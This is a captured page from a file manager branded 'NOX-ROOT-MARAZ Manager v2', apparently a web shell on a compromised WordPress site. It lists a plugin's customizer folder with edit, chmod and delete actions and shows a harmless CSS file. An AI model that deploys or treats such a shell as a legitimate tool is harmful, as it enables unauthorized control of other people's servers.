NOX-ROOT-MARAZ Manager v2
PHP 8+ Secure
/
home
/
xiedrke
/
malino
/
wp-content
/
plugins
/
trendz-plus
/
customizer
/
controls
/
background
/
Name
Size
Perms
Actions
📄 background.css
1,693 B
0644
Edit
|
Chmod
|
Delete
📄 background.js
6,556 B
0644
Edit
|
Chmod
|
Delete
Editing: background.css
.customize-control-wdt-background { position: relative; } .customize-control-wdt-background .wp-picker-container input[type="text"].wp-color-picker { max-width: 65px !important; } .customize-control-wdt-background .screen-reader-text { top: initial; } .customize-control-wdt-background .background-attachment h4, .customize-control-wdt-background .background-color h4, .customize-control-wdt-background .background-position h4, .customize-control-wdt-background .background-repeat h4, .customize-control-wdt-background .background-size h4 { margin-bottom: 5px; margin-top: 10px; } .customize-control-wdt-background .background-repeat { margin: 15px 0 8px 0; } .customize-control-wdt-background .background-attachment .buttonset, .customize-control-wdt-background .background-size .buttonset { display: flex; flex-wrap: wrap; } .customize-control-wdt-background .background-attachment .buttonset .switch-label, .customize-control-wdt-background .background-size .buttonset .switch-label { background: rgba(0, 0, 0, 0.05); border: 1px solid rgba(0, 0, 0, 0.1); color: #555; padding: 4px; margin: 0; text-align: center; flex-grow: 1; } .customize-control-wdt-background .background-attachment .buttonset .switch-input:checked + .switch-label, .customize-control-wdt-background .background-size .buttonset .switch-input:checked + .switch-label { background-color: #298cbe; color: #fff; } .customize-control-wdt-background .more-settings { margin-top: 12px; display: inline-block; padding: 5px 0 5px 0; float: right; } .customize-control-wdt-background .arrow-icon { margin-left: 5px; }
Cancel